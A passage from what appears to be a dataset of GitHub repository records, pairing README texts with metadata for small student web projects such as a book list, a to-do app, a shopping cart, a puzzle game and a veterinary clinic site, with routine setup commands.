you can enter directly to index.html ### Deployment No deployment needed, you can enter directly to index.html <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- AUTHORS --> ### 👥 Authors <a name="authors"></a> -👤 **Jorge Camargo** - GitHub: [@jicamargo](https://github.com/jicamargo) - Twitter: [@ji_camargo](https://twitter.com/ji_camargo) - LinkedIn: [LinkedIn](https://linkedin.com/in/jorgecamargog) <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- CONTRIBUTING --> ## 🤝 Contributing <a name="contributing"></a> Contributions, issues, and feature requests are welcome! Feel free to check the [issues page](../../issues/). <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- SUPPORT --> ## ⭐️ Show your support <a name="support"></a> If you like this project, please give a ⭐️ (Thank you) <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- ACKNOWLEDGEMENTS --> ## 🙏 Acknowledgments <a name="acknowledgements"></a> - [Microverse team]()https://microverse.org/ <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 📝 License <a name="license"></a> ### This project is [MIT](./LICENSE) licensed. <p align="right">(<a href="#readme-top">back to top</a>)</p>
A simple yet powerful tool that helps you stay organized and productive. With this app You can easily create tasks, edit, complete, and track your progress.
css,es6-javascript,html,javascript,webpack
2023-05-09T17:27:15Z
2023-05-12T20:17:26Z
null
1
3
27
0
0
7
null
MIT
JavaScript
jojo987N/awesome-books-es6
main
# 📗 Table of Contents - [📖 About the Project](#about-project) - [🛠 Built With](#built-with) - [Tech Stack](#tech-stack) - [Key Features](#key-features) - [🚀 Live Demo](#live-demo) - [💻 Getting Started](#getting-started) - [Setup](#setup) - [Prerequisites](#prerequisites) - [Install](#install) - [Usage](#usage) - [Deployment](#deployment) - [👥 Authors](#authors) - [🔭 Future Features](#future-features) - [🤝 Contributing](#contributing) - [⭐️ Show your support](#support) - [🙏 Acknowledgements](#acknowledgements) - [📝 License](#license) # 📖 Awesome books: plain JavaScript with objects <a name="about-project"></a> **Awesome books** is a basic website that allows users to add/remove books from a list . We achieve that by using JavaScript objects and arrays. We also dynamically modify the DOM and add basic events . we use Github flow and a descriptive and easy to understand README file. ## 🛠 Built With <a name="built-with"></a> - HTML - CSS - JavaScript - Linters ### Tech Stack <a name="tech-stack"></a> <details> <summary>Client</summary> <ul> <li><a href="https://developer.mozilla.org/en-US/docs/Web/HTML">HTML</a></li> </ul> <ul> <li><a href="https://developer.mozilla.org/en-US/docs/Web/CSS">CSS</a></li> </ul> <ul> <li><a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript">Javascript</a></li> </ul> </details> ### Key Features <a name="key-features"></a> - Add a new book to the collection - Remove a book from the collection - Display all books saved in the collection - Data is preserved in the browser's memory ## 🚀 Live Demo <a name="live-demo"></a> > Coming soon ## 💻 Getting Started <a name="getting-started"></a> To get a local copy up and running, follow these steps. ### Prerequisites In order to run this project you need: - Web browser. - Code editor. - Git scm. ### Setup Clone this repository to your desired folder: Run this command: ```sh cd my-folder git clone git@github.com:jojo987N/awesome-books.git ``` ### Install Install this project with: Run this command: ```sh cd my-folder npm install ``` ### Usage To run the project, execute the following command: Open index.html using live server extension. ### Deployment > Coming soon ## 👥 Authors <a name="getting-started"></a> 👤 Narcisse Jemba - GitHub: [@githubhandle](https://github.com/jojo987N) - Twitter: [@JembaNarcisse](https://twitter.com/JembaNarcisse) - LinkedIn: [LinkedIn](https://www.linkedin.com/in/narcisse-jemba-aa9488252/) 👤 Sumeya 👤 Ali Shah ## 🔭 Future Features <a name="future-features"></a> - [ ] Refactor to use JavaScript classes - [ ] A complete website with navigation - [ ] Add more styles ## 🤝 Contributing <a name="contributing"></a> Contributions, issues, and feature requests are welcome! Feel free to check the [issues page](../../issues/). ## ⭐️ Show your support <a name="support"></a> If you like this project just give it a star ⭐️ . Everybody is welcome to suggest changes in Awesome books project . In order to do it, fork this repository, create a new branch and open a Pull Request from your branch ## 🙏 Acknowledgments <a name="acknowledgements"></a> I would like to thank Microverse ## 📝 License <a name="license"></a> This project is [MIT](./LICENSE.md) licensed.
Awesome books is a simple website that displays a list of books and allows you to add and remove books from that list. This application manages data using JavaScript. Thanks to that the website is more interactive. It uses a medium-fidelity wireframe to build the UI.
css,css3,html,javascript
2023-04-28T13:21:21Z
2023-05-01T10:52:55Z
null
1
1
6
0
0
7
null
MIT
JavaScript
fdhhhdjd/Study_With_Me_Javascript
main
<p align="center"><a href="https://profile-forme.cf/" target="_blank"><img src="https://res.cloudinary.com/ecommerce2021/image/upload/v1659065987/avatar/logo_begsn1.png" width="300"></a></p> <h3 align="center"> Hi there, I'm <a href="https://profile-forme.cf/" target="_blank" rel="noreferrer">Tai Developer</a> 👋 </h3> <h2 align="center"> I'm a Full-Stack Web Developer 💻, Tearcher 🧑‍🏫! </h2> <p align="center"> <a href="https://www.linkedin.com/in/tai-nguyen-tien-787545213/"><img src="https://img.icons8.com/color/48/000000/linkedin-circled--v1.png" alt="Linkedin"></a> <a href="https://profile-forme.surge.sh"><img src="https://img.icons8.com/color/48/000000/internet--v1.png" alt="Profile"></a> <a href="tel:0798805741"><img src="https://img.icons8.com/color/48/000000/apple-phone.png" alt="Phone"></a> <a href = "mailto:nguyentientai10@gmail.com"><img src="https://img.icons8.com/fluency/48/000000/send-mass-email.png" alt="License"></a> </p> ## Study With Me Tai Heo Dev 30 Days of JS :fire: ## Liên hệ công việc 💬: https://profile-forme.cf ## 1. Nguyễn Tiến Tài ( Maintanin 🚩). ## 01. DrumKit <img src="https://res.cloudinary.com/taithinhnam/image/upload/v1682483808/Let%27s%20Code/7f636adf-7ec4-4a46-95fa-bbbe28fa59ed_h6jera.png" width="500"> ## 02. Clock <img src="https://res.cloudinary.com/taithinhnam/image/upload/v1682484321/Let%27s%20Code/z4296242607059_f7f3acf040b17d61071b8c994893e602_lrljfw.jpg" width="500"> ## 03. Css Slider <img src="https://res.cloudinary.com/taithinhnam/image/upload/v1682484323/Let%27s%20Code/z4296244273397_c575cb17abbd4c95946eaba5cc3fd89a_ia79ou.jpg" width="500"> ## 04. Array Done ## 05. Flex Gallery <img src="./assets/05.jpg" width="500"> ## 06. Ajax Type ![image](https://github.com/fdhhhdjd/Study_With_Me_Javascript/assets/63393170/a52cabcc-bb83-49fa-a8d7-e02c4550072b) ## Tài Khoản Donate li Cf để có động lực code cho anh em tham khảo 😄😄. ![giphy](https://3.bp.blogspot.com/-SzGvXn2sTmw/V6k-90GH3ZI/AAAAAAAAIsk/Q678Pil-0kITLPa3fD--JkNdnJVKi_BygCLcB/s1600/cf10-fbc08%2B%25281%2529.gif) ## Mk: NGUYEN TIEN TAI ## STK: 1651002972052 ## Chi Nhánh: NGAN HANG TMCP AN BINH (ABBANK). ## SUPORT CONTACT: [https://profile-forme.cf](https://profile-forme.cf) ## Thank You <3.
Course Web code 30 Days With Teacher Tài
css,html,javascript,let-scode
2023-04-26T03:58:20Z
2023-06-07T03:55:55Z
null
1
6
26
7
0
7
null
null
JavaScript
mondalraj/collabX
main
null
Decentralized Community for finding teammates/co-founder for your next project (Beta Version - For Programmers). Chainlink Automation - https://automation.chain.link/mumbai/59482924256045095183196812214652785693548674359252126669598351750622521168334
chainlink,hardhat,javascript,nextjs,solidity,tailwindcss,thirdweb,typescript,dao,erc1155
2023-04-30T15:41:24Z
2023-06-10T14:27:49Z
null
4
20
80
1
3
7
null
null
JavaScript
arkemishub/clientjs
main
# @arkejs/client ![Client](https://github.com/arkemishub/clientjs/assets/81776297/cf43c6aa-e219-48e3-9c7c-eb4e1ff56225) [![License](https://img.shields.io/badge/license-Apache2.0-blue.svg)](https://github.com/arkemishub/arke-monorepo/blob/master/LICENSE.txt) An isomorphic JavaScript client for Arke backend connection ## Usage First of all, you need to install the library: ```shell npm install @arkejs/client pnpm install @arkejs/client ``` Then you're able to import the library and establish the connection with the database: ```tsx import Client from '@arkejs/client' // Create a single arke js for interacting with your server const client = new Client({ serverUrl: 'http://localhost:4000', project: 'PROJECT_NAME', }) client.arke.get('my_arke').then( res => console.log(res.data), err => console.error(err.response.data) ) ``` When you initialize the client you can define custom methods to get the Auth session: ```tsx const client = new Client({ serverUrl: 'http://localhost:4000', project: 'PROJECT_NAME', getSession: async () => { const session = await AsyncStorage.getItem('@session'); return session; }, setSession: async session => { await AsyncStorage.setItem('@session', JSON.stringify(session.content)); }, }); ```
JS client for interacting with Arke backends
arke,client,javascript
2023-05-12T09:19:40Z
2024-04-26T14:53:15Z
2024-04-26T14:53:48Z
6
48
23
2
0
7
null
Apache-2.0
TypeScript
supunrandika98/Shopping-Cart-JavaScript
main
# Simple Shopping Cart - Javascript This is a Shopping Cart built with HTML, CSS,Bootstrap & JavaScript. In this simple shopping cart web application project I have used some of the more intermediate advanced parts of the document object model or the javascript dom to show how to build this web application. ## Features - Users can filter the product items. - User should click the 'Add to Cart' button to add a product to the cart. - A message displays if user try to add same product twise. - The cart displays the image, title, price, amount of each product that user has added to the cart. - User can remove any product item from the cart. - User can change the count of the products that they want to buy. - The total price of the products which are in the cart will display. ## Technologies Built with: - HTML - CSS - Bootstrap - JavaScript ## Screenshots ![](images/1.jpeg) ![](images/2.jpeg) ![](images/4.jpeg)
This is a simple shopping cart web application built with HTML, CSS ,Bootstrap & JavaScript.
bootstrap5,css,html5,imagefilter,javascript,shopping-cart,shopping-site
2023-04-29T12:41:51Z
2023-04-29T13:43:01Z
null
1
0
3
0
5
7
null
AGPL-3.0
HTML
MarcoDiaz2000/To-do-list
main
Hello, I am Marco Díaz <a name="readme-top"></a> # 📗 Table of Contents - [📖 About the Project](#about-project) - [🛠 Built With](#built-with) - [Tech Stack](#tech-stack) - [Key Features](#key-features) - [💻 Getting Started](#getting-started) - [Setup](#setup) - [Prerequisites](#prerequisites) - [Install](#install) - [Usage](#usage) - [Run tests](#run-tests) - [Deployment](#triangular_flag_on_post-deployment) - [👥 Authors](#authors) - [🔭 Future Features](#future-features) - [🤝 Contributing](#contributing) - [⭐️ Show your support](#support) - [🙏 Acknowledgements](#acknowledgements) - [❓ FAQ (OPTIONAL)](#faq) - [📝 License](#license) <!-- PROJECT DESCRIPTION --> # 📖 [To-do list] <a name="about-project"></a> "To-do list" is a tool that helps to organize your day. It simply lists the things that you need to do and allows you to mark them as complete. You will build a simple website that allows for doing that, and you will do it using ES6 and Webpack! ## 🛠 Built With <a name="built-with"></a> ### Tech Stack <a name="tech-stack"></a> HTML, CSS & JAVASCRIPT Webpack GitHub & Visual Studio Code <!-- Features --> ### Key Features <a name="key-features"></a> - Adding a new item. - Removing a selected item. - Marking a selected item as complete. - Removing all items marked as complete at once. - Reordering a selected item (as drag-and-drop) [as an additional feature]. <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- GETTING STARTED --> ## 💻 Getting Started <a name="getting-started"></a> ### Prerequisites In order to run this project you need: <a href="https://nodejs.org/en">- Node.js</a> <a href="https://git-scm.com/downloads">- Git</a> ### Setup Install Node Js on your local computer ### Install Install this project with: <pre> git clone https://github.com/MarcoDiaz2000/To-do-list.git</pre> ### Usage To run the project, open the index file by double clicking ### Run tests To run tests, run a live server on your computer. ### Deployment You can deploy this project in this link: <a href="https://marcodiaz2000.github.io/To-do-list/dist/">www.marcodiaz2000.github.io/To-do-list/dist/</a> <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- AUTHORS --> ## 👥 Author <a name="author"></a> 👤 **Marco Díaz** - GitHub: [@MarcoDiaz](https://github.com/MarcoDiaz2000) - Twitter: [@MarcoDiaz](https://twitter.com/MarcoDi70620847) - LinkedIn: [LinkedIn](https://www.linkedin.com/in/marco-diaz-0876a7268/) <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- CONTRIBUTING --> ## 🔭 Future Features <a name="future-features"></a> - The user should be able to reorder the list by dragging each item and moving it into the desired position. <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 🤝 Contributing <a name="contributing"></a> Contributions, issues, and feature requests are welcome! Feel free to check the [issues page](../../issues/). <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- SUPPORT --> ## ⭐️ Show your support <a name="support"></a> > Hello, feel free to support this project <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 🙏 Acknowledgments <a name="acknowledgements"></a> > I would like to thank Microverse for this opportunity to learn and practice. <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- LICENSE --> ## 📝 License <a name="license"></a> This project is [MIT](./LICENSE) licensed. <p align="right">(<a href="#readme-top">back to top</a>)</p>
"To-do list" is a tool that helps to organize your day. It simply lists the things that you need to do and allows you to mark them as complete. You will build a simple website that allows for doing that, and you will do it using ES6 and Webpack!
css,html,javascript
2023-05-03T09:06:57Z
2023-05-12T13:44:08Z
null
1
5
41
1
0
7
null
MIT
JavaScript
Drabovich/frontend-case-team-project
main
# Online courses Createx The first joint project, chat @frontend_case_chat, has come to an end (: In just over a week, the multi-page website "Online courses Createx" was created. It's time to sum it up! 1) 13 developers took part in the project! 2) 250 commits were made, 25 pull requests were made, 20 branches were created and it’s unclear how many conflicts in the code were resolved! 😀 3) 10 pages were created and the beauty is that everyone wrote as best they could, as they were used to with their own tricks :) Yes, of course, in many places there are jambs with adaptive, BUT in general the result is super cool!!! Just imagine that everyone did their own piece, their own page, as they knew how, as they were used to. And then all this needs to be combined into a single mechanism. I think the guys got a good experience working at GitHub and more. I’m glad that everyone who started making their own site didn’t give up or merge, but brought the job to the end! I would like to highlight people who especially distinguished themselves: 1) @stasholmansky and Alexandr - they made their own page and rushed to piece together the entire project, fixing endless bugs! 2) John Konan is a completely different story) The man who covered all the holes in our project! First he made the 404 page, then Contacts, then header and footer. Replacing people who were unable to eventually start doing their part and left the race! 3) All girls! It was a shock to me how cool they make layouts) Everyone, really everyone, has a good level of workbench!
First joint chat project @frontend_case_chat
css,html,javascript
2023-04-29T07:51:12Z
2024-02-10T06:05:29Z
null
12
25
255
0
0
7
null
null
HTML
abhipathak1/TravTok
main
# TravTok website for eyesware Welcome to TravTok its was user-friendly travel website. Discover the world's hidden gems and embark on unforgettable adventures with our travel website. Plan your dream vacation effortlessly with our user-friendly travel website. This is a collaborative Project from Masai School in the Construct Week With the 3 team members within 5 Days. Deployed URL 👉 [https://travtok.netlify.app/] Our Team Members Abhay Pathak (My Linkedin profile :-https://www.linkedin.com/in/abhay-pathak-824070257) Rutik Jadhav (My Linkedin Profile:-https://www.linkedin.com/in/rutik-jadhav-364070657) Vamshi Krishna Bejjarapu (My Linkedin Profile:- https://www.linkedin.com/in/vamshi-krishna-bejjarapu-559388257/) 💻 Tech Stack ![image](https://user-images.githubusercontent.com/80309747/229348805-946f60f0-26c4-4069-9fb7-3d450e7abc51.png) ![image](https://user-images.githubusercontent.com/80309747/229348825-9ba7f0b5-db77-4025-8d48-d1e38421d0f0.png) ![image](https://user-images.githubusercontent.com/80309747/229348835-da03d010-e01e-4299-ad47-53e08d5b49fb.png) Tools ![image](https://user-images.githubusercontent.com/80309747/229348866-a41c6e5d-458a-4396-a0f6-ce974e5cfae0.png) ![image](https://user-images.githubusercontent.com/80309747/229348874-6e5a14c8-46e7-457c-b14c-c2491866064f.png) ![image](https://user-images.githubusercontent.com/80309747/229348884-8fd728ce-a616-4341-a4ca-fe15677f0d3c.png) Let's Dive into What we have made Home Page : <img width="935" alt="Home" src="https://github.com/abhipathak1/sharp-lumber-1926/assets/121400752/8cdc4781-25ab-4432-bfd5-1b0181e9db36"> Footer page: <img width="960" alt="footer" src="https://github.com/abhipathak1/sharp-lumber-1926/assets/121400752/49acf093-0da7-450c-a20e-bfd6b25dad68"> Login Page : <img width="911" alt="login" src="https://github.com/abhipathak1/sharp-lumber-1926/assets/121400752/ed70c512-b60b-4790-a63c-5e284de4d865"> Sign-Up Page : <img width="908" alt="signup" src="https://github.com/abhipathak1/sharp-lumber-1926/assets/121400752/10f4bfaa-1349-464a-b513-aa0461dde046"> Product Page : <img width="960" alt="productspage" src="https://github.com/abhipathak1/sharp-lumber-1926/assets/121400752/d9d2dd0e-6008-4871-a811-b64288788f08"> Payment Page: <img width="906" alt="Payment" src="https://github.com/abhipathak1/sharp-lumber-1926/assets/121400752/57d5b32d-c7ae-4bed-b806-54af8b2926b8"> <img width="960" alt="paymentinfo" src="https://github.com/abhipathak1/sharp-lumber-1926/assets/121400752/535e98d6-e51c-42bd-8d79-5f4b7648cd6a"> OTP: <img width="960" alt="otp" src="https://github.com/abhipathak1/sharp-lumber-1926/assets/121400752/981a673b-38a5-41c6-be43-4b7da66ec2f0"> <img width="960" alt="otpinfo" src="https://github.com/abhipathak1/sharp-lumber-1926/assets/121400752/31ae5998-be8c-4e04-a73d-a2305db42483"> Admin Dashboard Page : <img width="943" alt="AdminHome" src="https://github.com/abhipathak1/sharp-lumber-1926/assets/121400752/62ec491d-7f5d-482a-8db3-e635057f1426"> Admin Add Product Page : <img width="950" alt="AdminTours" src="https://github.com/abhipathak1/sharp-lumber-1926/assets/121400752/cdb61366-7d6a-4fd8-bf7e-33abb7959071"> Admin Users : <img width="950" alt="AdminUser" src="https://github.com/abhipathak1/sharp-lumber-1926/assets/121400752/2be611ec-0395-4fa4-9f8d-bae93afbd127"> Our Learnings On this journey we faced many issues, but we keep motivated each other with patience. We all learned how to read and understand the code of other team members. We learned how to write more efficient and clean code. Even though We also learned how to plan a project and how to execute it step by step. By this Project we have learned how to collaborate and communicate with team effectively and improving the productivity. We also got a glimpse of using GitHub for the version control. Source Code(GitHub link):- https://github.com/abhipathak1/sharp-lumber-1926 Show your support Give a ⭐️ if you like this project! Thank you
A website inspired by the Dribbble template, serving as a traveler's guide for exploring Seoul based on the theme 'Things to do in Seoul.
css,html,javascript
2023-05-02T18:46:11Z
2024-02-25T13:07:46Z
null
4
11
52
0
1
7
null
null
HTML
panditakshay402/WebHealth
master
# WebHealth A responsive healthcare website for patients and healthcare providers. ## Features - Appointment booking - Medical record management - Prescription requests - Chat with healthcare providers - Health tips and articles ## Technologies Used - HTML5 - CSS3 - JavaScript - Bootstrap - jQuery - PHP - MySQL ## Installation 1. Clone the repository 2. Import the database schema from the `database.sql` file 3. Configure the database connection in the `config.php` file 4. Start the web server ## Usage To use WebHealth, simply open the `index.html` file in your web browser and start exploring the features. ## Contributing If you want to contribute to WebHealth, feel free to submit a pull request or open an issue. ## License This project is licensed under the MIT License - see the `LICENSE` file for details.
The health web project is a responsive website built using HTML, CSS, JavaScript, PHP, and MySQL. The website aims to provide a platform for users to access and manage their health records, as well as connect with healthcare providers and find relevant health information. The website design is fully responsive, ensuring that it is accessible.
bootstrap,css3,html,javascript,php
2023-05-01T17:31:20Z
2023-05-02T19:55:48Z
null
1
0
7
0
1
7
null
null
HTML
braiekhazem/numpuz_game
main
<h1>Numpuz</h1> <p>Numpuz is a puzzle game where the player needs to arrange a set of shuffled numbers in ascending order. The game provides an interactive user interface where the player can easily move the numbers around to solve the puzzle. This application is developed using ReactJS.</p> <p align="center"> <img src="https://res.cloudinary.com/dj6kxvxqb/image/upload/v1683716664/Screen_Shot_2023-05-10_at_12.02.57_PM_yvh86q.png" width="33%"/> <img src="https://res.cloudinary.com/dj6kxvxqb/image/upload/v1683716664/Screen_Shot_2023-05-10_at_12.03.25_PM_fnnvgg.png" width="33%"/> <img src="https://res.cloudinary.com/dj6kxvxqb/image/upload/v1683721526/Screen_Shot_2023-05-10_at_1.24.59_PM_g40n5s.png" width="33%"/> <img src="https://res.cloudinary.com/dj6kxvxqb/image/upload/v1683716662/Screen_Shot_2023-05-10_at_12.04.04_PM_qgquii.png" width="33%"/> </p> <h2>Features</h2> <ul> <li>The game board can be customized with three different sizes: (3x3, 4x4, 5x5...)</li> <li>The player can move numbers around by clicking on the adjacent empty cell.</li> <li>The game is won when all the numbers are arranged in ascending order.</li> <li>The player can reset the game at any time by clicking the "Reset" button.</li> <li>The application is responsive and works well on both desktop and mobile devices.</li> </ul> <h2>Installation</h2> <p>To install the application, follow these steps:</p> <ol> <li>Clone the repository to your local machine using the command <code>git clone https://github.com/braiekhazem/numpuz_game.git</code>.</li> <li>Navigate to the project directory using the command <code>cd numpuz_game</code>.</li> <li>Install the dependencies using the command <code>npm install</code>.</li> </ol> <h2>Usage</h2> <p>To start the application, run the following command in the project directory:</p> <pre><code>npm start</code></pre> <p>This will start the development server and open the application in your default browser. You can also access the application by visiting <code>http://localhost:3000</code> in your browser.</p> <h2>Game Instructions</h2> <p>The objective of the game is to arrange the shuffled numbers in ascending order. To move a number, click on the adjacent empty cell. You can customize the size of the game board by selecting from the options on the main screen. The game is won when all the numbers are arranged in ascending order.</p> <h2>Contributing</h2> <p>Thank you for considering contributing to the development of Numpuz! Here are a few guidelines to follow to make the process smoother:</p> <h3>Issues and Bugs</h3> <p>If you encounter any issues or bugs while using Numpuz, please submit an issue on the project's GitHub page. When submitting an issue, please include a clear and detailed description of the problem, along with any relevant screenshots or error messages.</p> <h3>Pull Requests</h3> <p>If you would like to contribute to the codebase, please follow these steps:</p> <ol> <li>Fork the project on GitHub.</li> <li>Create a new branch with a descriptive name.</li> <li>Make your changes and test them thoroughly.</li> <li>Submit a pull request with a clear and detailed description of your changes.</li> </ol> <h2> Live Demo : https://numpuz-game.web.app </h2>
Numpuz is a puzzle game where the player needs to arrange a set of shuffled numbers in ascending order, players can easily move the numbers around to solve the puzzle and improve their problem-solving skills.
css,frontend,game,game-development,gamedev,gameprogramming,html,javascript,puzzlegame,reactjs
2023-05-04T08:58:47Z
2023-05-11T14:44:55Z
null
1
0
8
0
0
7
null
null
JavaScript
shuoros/coderman
main
# Coderman ![idle-down](https://github.com/shuoros/Coderman/assets/45015114/60350dab-6d59-4a48-b7c9-794ba882215a) Coderman is a 2D role-playing game in pixel art style. The story of this game is about a programmer called Coderman who fights with bugs with his superhero powers and destroys them and makes the applications continue to run. **This project is currently under development 🚧🏗️** ![idle-down](sample.gif) # What's new in v0.1.0 - Rendering Map and Sprite - Animation for Sprite - Keyboard controller to controlling character movement ## Install & Run Simply clone this repo into your machine and open `index.html` up on your browser. (Google Chrome recommended) ## Authors Coderman is developed by [Soroush Shemshadi](https://github.com/shuoros) and [contributors](CONTRIBUTORS.md). # Contribution If you have any idea about the game or want to contribute on this project, Please read the [contribution guide](CONTRIBUTE.md). ## Releases To see the changes in different versions of Coderman, you can read the [release notes](RELEASENOTES.md). ## Issues If you encounter a bug or vulnerability, please read the [issue policy](ISSUES.md).
🎮 Coderman is a 2d pixel art role playing game
javascript,2d-game,pixelart,rpg-game
2023-05-14T09:26:05Z
2023-05-30T09:27:24Z
null
1
0
36
0
0
7
null
MIT
JavaScript
adanj27/Web-Dev-Hut-Open-Source
main
<p align="center"> <img src="./src/assets/logo2.png" width="318px" alt="WebDevHut logo" /> </p> <p align="center"> ![](https://img.shields.io/github/stars/adanj27/Web-Dev-Hut-Open-Source.svg) ![](https://img.shields.io/badge/Maintained%3F-yes-green.svg) ![](https://img.shields.io/github/issues/adanj27/Web-Dev-Hut-Open-Source.svg) [![Licencia MIT](https://img.shields.io/github/license/adanj27/Web-Dev-Hut-Open-Source.svg)](https://github.com/adanj27/Web-Dev-Hut-Open-Source/blob/main/LICENSE) </p> <p align="center"> <img src="https://live.staticflickr.com/65535/52875956458_70fa5028e0_b.jpg" /> </p> #### WebDevHut es una web para aprender desarrollo web frontend y backend donde encontraras información sobre las tecnologías y herramientas necesarias que se usan en desarrollo web en general. Este es un proyecto de Open Source desarrollado conjuntamente por un grupo de gente que le encanta desarrollo web. - Si estas interesado en ser parte del proyecto por favor únete a nuestro canal de discord. - [Discord](https://discord.gg/Hmew77TY). ## ⏳ Instalación - (Usa npm para instalar las dependencias del proyecto.) ```bash npm install ``` - (Usa npm para iniciar el proyecto.) ```bash npm run dev ``` ## 🔗 Enlaces - [Discord](https://discord.gg/Hmew77TY). - [Diseño Figma](https://www.figma.com/file/CVUWo2Up36fZrrC21cRi2J/Dise%C3%B1o-mockups?type=design&node-id=62%3A2&t=VS53gq55k94o10Bw-1). - [Tareas del Proyecto](https://github.com/users/adanj27/projects/6/views/1) - Nota: Seguir el diseño hecho en figma. ## 🚀 Contribución ¡Gracias por tu interés en contribuir a nuestro proyecto! Aquí te mostramos cómo puedes hacerlo. - Lee las directrices de contribución antes de enviar cualquier cambio. - Sé respetuoso con otros contribuidores y usuarios del proyecto. - Contribuye con código de alta calidad que cumpla con las convenciones de estilo del proyecto. - Comunícate de manera clara y efectiva con el equipo del proyecto. - Haz cambios pequeños y realiza pruebas antes de enviar cambios. - Respeta las decisiones del equipo del proyecto si su contribución es rechazada. ### 🌀 Clonar y forkear el repositorio - Primero, clona el repositorio en tu máquina local usando el siguiente comando en tu terminal: ```bash git clone https://github.com/adanj27/Web-Dev-Hut-Open-Source.git ``` Si aún no lo has hecho, forkea el repositorio en tu cuenta de GitHub para tener tu propia copia del proyecto. ### 🔍 Revisar la ruta del proyecto - Antes de comenzar a trabajar en una nueva función o corrección, es importante revisar la ruta del proyecto para asegurarte de estar trabajando en la rama correcta y el archivo correcto. ### 📝 Elegir una tarea - El siguiente paso es elegir una tarea para trabajar en ella. Puedes encontrar tareas en la sección de [projects](https://github.com/users/adanj27/projects/6/views/1) en el repositorio. Elige una y copia el enlace y pide a algún administrador que te asigne la tarea dandole tu nombre de usuario de github y el enlace de la tarea. ### 📂 Crear una rama - Crea una nueva rama desde la rama principal (main o master) utilizando un nombre descriptivo que indique el problema que estás solucionando. Por ejemplo: ```bash git checkout -b mi-nueva-funcion ``` ### 💻 Realizar cambios y hacer commit - Haz los cambios necesarios en la rama que creaste y crea un commit utilizando la convención de commit convencional para asegurarte de que se entienda claramente lo que estás haciendo. Los prefijos comunes son `feat`, `fix`, `doc`, `style`, `refactor`, `test` y `chore`. ```bash git commit -m "feat: agregar nueva función de búsqueda" ``` ### 📤 Hacer push a tu rama - Haz push de tu rama a tu repositorio forkeado en GitHub. ```bash git push origin mi-nueva-funcion ``` ### 🤝 Enviar un Pull Request - Ejecutar eslint antes de enviar o subir tu rama ejecuta: ```bash npm run lint:fix ``` - Si tienes conflictos en la revisión de `lint` y `build` elimina tu Pull Request, revisa tu código, vuelve a ejecutar `npm run lint:fix` actualiza tu rama y envia una Pull Request a la rama master. - Envía un Pull Request a la rama `master` del repositorio original con tu nueva rama. Asegúrate de proporcionar una descripción clara y detallada de los cambios que has realizado y por qué son importantes. ### 🕵️‍♂️ Esperar la revisión y aprobación - El equipo del proyecto revisará y discutirá tus cambios. Es posible que necesiten que realices algunos ajustes antes de que se puedan fusionar tus cambios en la rama principal. 🎉 ¡Gracias por tu contribución al proyecto! ## 📜 Licencia Copyright © 2023 WebDevHut ## MIT - Vea el archivo [LICENSE](./LICENSE) para mas información de la licencia.
WebDevHut es un sitio de información sobre desarrollo web frontend y backend
backend,css3,frontend,fullstack,html,javascript,open-source,programming,react,tailwind
2023-05-04T00:06:43Z
2023-05-09T13:41:06Z
null
16
89
36
2
9
7
null
MIT
JavaScript
Rubel011/Vetspot_veterinary-clinic_website
main
## ABOUT THE PROJECT <h1> Vetspot </h1> <div align="center" width="40" height="55"> <img src="frontend/images/Blue Pet Care Clinic Business Logo.png" alt="html" width="200" height="100"/> <br> <br> <p>Vetspot is designed to streamline and optimize the operations of a veterinary clinic. It offers features such as patient management, appointment scheduling, billing and invoicing, inventory management, and reporting and analytics. With a user-friendly interface, this system aims to enhance efficiency and effectiveness in veterinary care. Refer to the documentation for installation and usage instructions. Contributions from the community are welcome. </p> <br> </div> ## TECH STACKS USED <p align = "center"> <img src="https://github.com/PrinceCorwin/Useful-tech-icons/blob/main/images/HTML.png" alt="html" width="55" height="55"/> <img src="https://user-images.githubusercontent.com/25181517/183898674-75a4a1b1-f960-4ea9-abcb-637170a00a75.png" alt="CSS" width="50" height="55"/> <img src="https://user-images.githubusercontent.com/25181517/117447155-6a868a00-af3d-11eb-9cfe-245df15c9f3f.png" alt="js" width="50" height="50"/> <img src="https://raw.githubusercontent.com/PrinceCorwin/Useful-tech-icons/main/images/nodejs.png" alt="nodejs" width="50" height="50"/> <img src="https://res.cloudinary.com/kc-cloud/images/f_auto,q_auto/v1651772163/expressjslogo/expressjslogo.webp?_i=AA" alt="express" width="50" height="50"/> <img src="https://raw.githubusercontent.com/PrinceCorwin/Useful-tech-icons/main/images/mongodb-leaf.png" alt="mongo" width="50" height="50"/> <img src="https://user-images.githubusercontent.com/25181517/182884894-d3fa6ee0-f2b4-4960-9961-64740f533f2a.png" alt="redis" width="50" height="50"/> <img src="https://user-images.githubusercontent.com/25181517/121401671-49102800-c959-11eb-9f6f-74d49a5e1774.png" alt="npm" width="50" height="50"/> </p> <hr> ## Features - Authentication - API Validation - Responsive - Cross Platform - Different Interface for both Users and Trainers - Registeration/Signin/Logout - Class Creation - Class Booking - Admin can perform all CRUD operations ## Run Locally ### Clone this Project ``` https://github.com/Rubel011/Vetspot_veterinary-clinic_website.git ``` ### Install npm Packages ```javascript npm i --global ``` ### Go to Backend Folder ```javascript cd Backend ``` ### Run Server ```javascript npm run server ``` ### Runs the project in the development mode [http://localhost:8080](http://localhost:8080) ## Run To run this application, you have to set your own environmental variables. For security reasons, some variables have been hidden from view and used as environmental variables with the help of dotenv package. Below are the variables that you need to set in order to run the application: - **PORT** : this is a port of website server - **mongoUrl**: this is the connection string of your MongoDB Atlas database. - **EMAIL_ID**, **GOOGLEKEY** : the email and password given to nodemailer to send/receive the email. Please put a real email and password here because you will receive the messages sent from the contact us form on this email. - **JWT_SECRET**, **REFRESH_TOKEN_SECRET** : this is the for the access token and refresh token using jwt and we need to set the secret key for that. - **redis_url** : Use a secure and unique method to generate the Redis URL for secure connection and data storage. ## NPM Packages <p align = "center"> <img src="https://repository-images.githubusercontent.com/139898859/9617c480-81c2-11ea-94fc-322231ead1f0" alt="bcrypt.png" width="70" height="50"/> <img 